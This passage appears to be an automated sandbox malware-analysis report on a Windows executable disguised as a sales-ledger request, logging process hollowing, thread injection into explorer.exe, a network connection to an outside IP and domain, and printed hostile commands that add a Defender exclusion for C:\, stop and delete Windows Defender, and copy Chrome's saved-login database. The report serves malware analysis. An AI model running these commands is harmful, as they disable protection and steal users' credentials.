                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]32_2_04D5B8D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5B8D0 mov ecx, dword ptr fs:[00000030h]32_2_04D5B8D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]32_2_04D5B8D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]32_2_04D5B8D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]32_2_04D5B8D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]32_2_04D5B8D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC58EC mov eax, dword ptr fs:[00000030h]32_2_04CC58EC
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h]32_2_04CC40E1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h]32_2_04CC40E1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h]32_2_04CC40E1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC9080 mov eax, dword ptr fs:[00000030h]32_2_04CC9080
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D43884 mov eax, dword ptr fs:[00000030h]32_2_04D43884
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D43884 mov eax, dword ptr fs:[00000030h]32_2_04D43884
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]32_2_04CF20A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]32_2_04CF20A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]32_2_04CF20A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]32_2_04CF20A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]32_2_04CF20A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]32_2_04CF20A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFF0BF mov ecx, dword ptr fs:[00000030h]32_2_04CFF0BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFF0BF mov eax, dword ptr fs:[00000030h]32_2_04CFF0BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFF0BF mov eax, dword ptr fs:[00000030h]32_2_04CFF0BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D090AF mov eax, dword ptr fs:[00000030h]32_2_04D090AF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE0050 mov eax, dword ptr fs:[00000030h]32_2_04CE0050
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE0050 mov eax, dword ptr fs:[00000030h]32_2_04CE0050
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D82073 mov eax, dword ptr fs:[00000030h]32_2_04D82073
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D91074 mov eax, dword ptr fs:[00000030h]32_2_04D91074
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h]32_2_04D47016
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h]32_2_04D47016
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h]32_2_04D47016
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D94015 mov eax, dword ptr fs:[00000030h]32_2_04D94015
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D94015 mov eax, dword ptr fs:[00000030h]32_2_04D94015
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]32_2_04CF002D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]32_2_04CF002D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]32_2_04CF002D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]32_2_04CF002D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]32_2_04CF002D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h]32_2_04CDB02A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h]32_2_04CDB02A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h]32_2_04CDB02A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h]32_2_04CDB02A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h]32_2_04CEA830
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h]32_2_04CEA830
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h]32_2_04CEA830
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h]32_2_04CEA830
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h]32_2_04CCB1E1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h]32_2_04CCB1E1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h]32_2_04CCB1E1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D541E8 mov eax, dword ptr fs:[00000030h]32_2_04D541E8
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFA185 mov eax, dword ptr fs:[00000030h]32_2_04CFA185
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEC182 mov eax, dword ptr fs:[00000030h]32_2_04CEC182
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF2990 mov eax, dword ptr fs:[00000030h]32_2_04CF2990
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h]32_2_04D451BE
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h]32_2_04D451BE
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h]32_2_04D451BE
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h]32_2_04D451BE
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF61A0 mov eax, dword ptr fs:[00000030h]32_2_04CF61A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF61A0 mov eax, dword ptr fs:[00000030h]32_2_04CF61A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h]32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D469A6 mov eax, dword ptr fs:[00000030h]32_2_04D469A6
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h]32_2_04D849A4
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h]32_2_04D849A4
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h]32_2_04D849A4
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h]32_2_04D849A4
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h]32_2_04CEB944
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h]32_2_04CEB944
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.90 80
                  Source: C:\Windows\explorer.exeDomain query: www.seniorlivingcaelderly.com
                  Adds a directory exclusion to Windows DefenderShow sources
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\Jump to behavior
                  Maps a DLL or memory area into another processShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                  Modifies the context of a thread in another process (thread injection)Show sources
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeThread register set: target process: 3388
                  Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3388
                  Queues an APC in another process (thread injection)Show sources
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeThread APC queued: target process: C:\Windows\explorer.exe
                  Sample uses process hollowing techniqueShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 960000
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,9_2_00401C26
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /RunJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /RunJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\Jump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332Jump to behavior
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                  Source: explorer.exe, 00000019.00000000.318115996.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
                  Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
